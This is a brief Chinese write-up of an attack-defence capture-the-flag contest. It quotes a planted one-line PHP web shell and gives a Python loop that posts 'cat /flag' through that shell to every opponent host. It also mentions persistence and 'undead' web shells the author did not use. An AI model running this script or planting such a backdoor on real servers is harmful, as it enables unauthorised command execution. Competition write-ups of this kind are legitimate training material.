最简短的一集，小时候看这集吓哭了

总共三道题，第一道题在网站根目录下有..php文件，内容如下

<?=@$_POST[9]=>

于是写个批量脚本，顺带一提其他靶机还不用扫ip，官方给

import requests

url_list = ...
data = {
    "9": "echo `cat /flag`"
}
for url in url_list:
    url = url + "/..php"
    print(url)
    try:
        res = requests.post(url=url, data=data)
        print(res.text)
    except:
        continue

完事

第二题要先攻破自己的服务器，拿到自己的flag，才有自己服务器的ssh用户及密码，才能有攻打别人的资格

我扫了扫，只开了三个端，分别是22，3306，8009

根本不会，从头到尾只有被打的分

第三题是Pwn，pwn手似的很安详

也就是说，我在开局前30分钟写了个最简单的脚本，打了整整14轮，别的题一分没拿，光靠这个得了8940分，拿了第五名

回想起来，我甚至没有权限维持，甚至没有传不死马，所有的工具全部无用，所有的前期准备像个笑话，就这还能拿第五名